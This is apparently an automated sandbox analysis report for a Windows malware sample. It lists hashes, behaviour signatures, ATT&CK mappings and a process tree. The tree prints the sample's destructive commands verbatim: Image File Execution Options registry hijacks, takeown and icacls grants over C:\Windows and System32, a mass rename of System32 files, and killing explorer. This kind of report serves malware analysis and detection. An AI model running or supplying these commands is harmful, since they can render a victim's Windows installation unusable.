Analysis

  • max time kernel: 169s
  • max time network: 50s
  • platform: windows7_x64
  • resource: win7-20220414-en
  • submitted: 11-05-2022 22:42

General

  • Target: 38674f024ba7dbc7cc7a461d1b60b948ee7abbd5e81d26f25f991373cf196ad6.exe
  • Size: 865KB
  • MD5: a11969b7f736f7613b76a2def8c51dbc
  • SHA1: fa055058e2c1db2fb83ec6b7da9f1c41648889e3
  • SHA256: 38674f024ba7dbc7cc7a461d1b60b948ee7abbd5e81d26f25f991373cf196ad6
  • SHA512: 9ff92c00a0a78786a2222082e3a3452f9d20249844b10cfc774849ad49e56904d9eddb0b3d3b25106bfe741d84fa685b16e15745ba304aaaeb02854bbe3705ec

Score
8/10

Malware Config

Signatures

  • Possible privilege escalation attempt (4 IoCs)
  • Modifies file permissions (1 TTPs, 4 IoCs)
  • Kills process with taskkill (2 IoCs)
  • Modifies registry key (1 TTPs, 2 IoCs)
  • Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
  • Suspicious use of AdjustPrivilegeToken (3 IoCs)
  • Suspicious use of FindShellTrayWindow (64 IoCs)
  • Suspicious use of SendNotifyMessage (2 IoCs)
  • Suspicious use of WriteProcessMemory (64 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\38674f024ba7dbc7cc7a461d1b60b948ee7abbd5e81d26f25f991373cf196ad6.exe
    "C:\Users\Admin\AppData\Local\Temp\38674f024ba7dbc7cc7a461d1b60b948ee7abbd5e81d26f25f991373cf196ad6.exe"
    1⤵
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:956
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\logonui.exe /v logon /t REG_SZ /d 'wscript.exe' /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1540
      • C:\Windows\SysWOW64\reg.exe
        reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\logonui.exe /v logon /t REG_SZ /d 'wscript.exe' /f
        3⤵
        • Modifies registry key
        PID:848
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe /v explorer /t REG_SZ /d 'wscript.exe' /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1568
      • C:\Windows\SysWOW64\reg.exe
        reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe /v explorer /t REG_SZ /d 'wscript.exe' /f
        3⤵
        • Modifies registry key
        PID:524
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c taskkill /f /im explorer.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1388
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im explorer.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1720
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c takeown /f C:\Windows\System32\
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1300
      • C:\Windows\SysWOW64\takeown.exe
        takeown /f C:\Windows\System32\
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:704
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c icacls C:\Windows\System32 /Grant Users:F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1048
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\Windows\System32 /Grant Users:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1064
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c takeown /f C:\Windows\
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1676
      • C:\Windows\SysWOW64\takeown.exe
        takeown /f C:\Windows\
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:976
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c icacls C:\Windows\ /Grant Users:F
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1504
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\Windows\ /Grant Users:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1112
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ren C:\Windows\system32\*.* *.lolxxd
      2⤵
      PID:1920
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c taskkill /f /im explorer.exe
      2⤵
      PID:1336
      • C:\Windows\SysWOW64\taskkill.exe
        taskkill /f /im explorer.exe
        3⤵
        • Kills process with taskkill
        PID:1264

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

  • File Permissions Modification (1): T1222
  • Modify Registry (1): T1112

Downloads

  • memory/524-61-0x0000000000000000-mapping.dmp
  • memory/704-64-0x0000000000000000-mapping.dmp
  • memory/848-60-0x0000000000000000-mapping.dmp
  • memory/956-54-0x0000000076181000-0x0000000076183000-memory.dmp (Filesize: 8KB)
  • memory/976-66-0x0000000000000000-mapping.dmp
  • memory/1048-59-0x0000000000000000-mapping.dmp
  • memory/1064-67-0x0000000000000000-mapping.dmp
  • memory/1112-68-0x0000000000000000-mapping.dmp
  • memory/1264-71-0x0000000000000000-mapping.dmp
  • memory/1300-58-0x0000000000000000-mapping.dmp
  • memory/1336-70-0x0000000000000000-mapping.dmp
  • memory/1388-57-0x0000000000000000-mapping.dmp
  • memory/1504-63-0x0000000000000000-mapping.dmp
  • memory/1540-55-0x0000000000000000-mapping.dmp
  • memory/1568-56-0x0000000000000000-mapping.dmp
  • memory/1676-62-0x0000000000000000-mapping.dmp
  • memory/1720-65-0x0000000000000000-mapping.dmp
  • memory/1920-69-0x0000000000000000-mapping.dmp